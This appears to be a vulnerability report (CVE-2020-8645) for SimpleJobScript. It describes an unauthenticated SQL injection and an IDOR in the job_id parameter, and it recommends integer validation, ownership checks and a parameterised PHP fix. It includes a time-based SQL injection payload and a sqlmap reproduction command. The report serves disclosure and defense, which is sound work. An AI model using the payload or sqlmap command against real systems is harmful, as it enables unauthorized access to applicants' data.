Description: An issue was discovered in Simplejobscript.com SJS through 1.66. There is an unauthenticated SQL injection via the job applications search function. The vulnerable parameter is job_id. The function is getJobApplicationsByJobId(). The file is _lib/class.JobApplication.php.
Environment:
Version: 1.64
OS: Ubuntu 16.10
Web server: Apache 2.4.18
PHP: 5.6.40
Database: MySQL 5.7.28
URL: /get_job_applications_ajax.php
Payload: job_id=493+AND+(SELECT+9069+FROM+(SELECT(SLEEP(5)))Ufmy)
For that one, I recommend casting the vulnerable parameter to int().
It would also be great to check that the job_id provided belongs to the connected user. For now every user, even unauthenticated, can retrieve all applications by looping through that number, which is basically what we call an IDOR.
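As an added illustration of the two fixes recommended above (example code written for this page, not SJS's own; the `job_applications` and `jobs` tables, the `user_id` column and the `$pdo` PDO connection are assumptions, and the code stays PHP 5.6 compatible to match the reported environment):

```php
<?php
// Added example, not SJS code: a hardened version of the job-application lookup.
// Assumed schema (hypothetical): job_applications(id, job_id, ...), jobs(id, user_id).
// Assumed: $pdo is a PDO connection to the MySQL database.

/**
 * Returns the applications for one job, but only if that job belongs to $currentUserId.
 * Two controls from the report: strict integer handling of job_id (no SQL injection)
 * and an ownership check (no IDOR by enumerating job ids).
 */
function getJobApplicationsByJobIdSecure(PDO $pdo, $rawJobId, $currentUserId)
{
    // Reject anything that is not a positive integer before it reaches SQL.
    // FILTER_VALIDATE_INT refuses "493 AND (SELECT ...)", "493.0", "0x1ed", arrays and null.
    $jobId = filter_var($rawJobId, FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)));
    if ($jobId === false) {
        throw new InvalidArgumentException('job_id must be a positive integer');
    }

    // Parameterised query: values are bound, never interpolated into the SQL text.
    // The JOIN on jobs.user_id enforces that the caller owns the job.
    $sql = 'SELECT a.* FROM job_applications a
            INNER JOIN jobs j ON j.id = a.job_id
            WHERE a.job_id = :job_id AND j.user_id = :user_id';
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':job_id', $jobId, PDO::PARAM_INT);
    $stmt->bindValue(':user_id', (int) $currentUserId, PDO::PARAM_INT);
    $stmt->execute();

    // A job owned by someone else yields the same empty result as a non-existent job,
    // so the endpoint reveals nothing about other users' jobs.
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Endpoint-side usage in get_job_applications_ajax.php (assumed session handling):
// if (empty($_SESSION['user_id'])) { http_response_code(401); exit; }
// $rawJobId = isset($_POST['job_id']) ? $_POST['job_id'] : null;
// $rows = getJobApplicationsByJobIdSecure($pdo, $rawJobId, $_SESSION['user_id']);
```

The 401 check matters on its own: without it the ownership JOIN has no user to compare against, and the report notes the endpoint is reachable without authentication.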
gwen001 changed the title from "[security] SQL injection in job applications search function" to "[security] CVE-2020-8645, SQL injection in job applications search function" on Feb 5, 2020.
Steps to Reproduce:
$ sqlmap --batch --threads=10 --dbms=mysql -u "http://local.simplejobscript.net/get_job_applications_ajax.php" --data="job_id=493" --banner
PoC: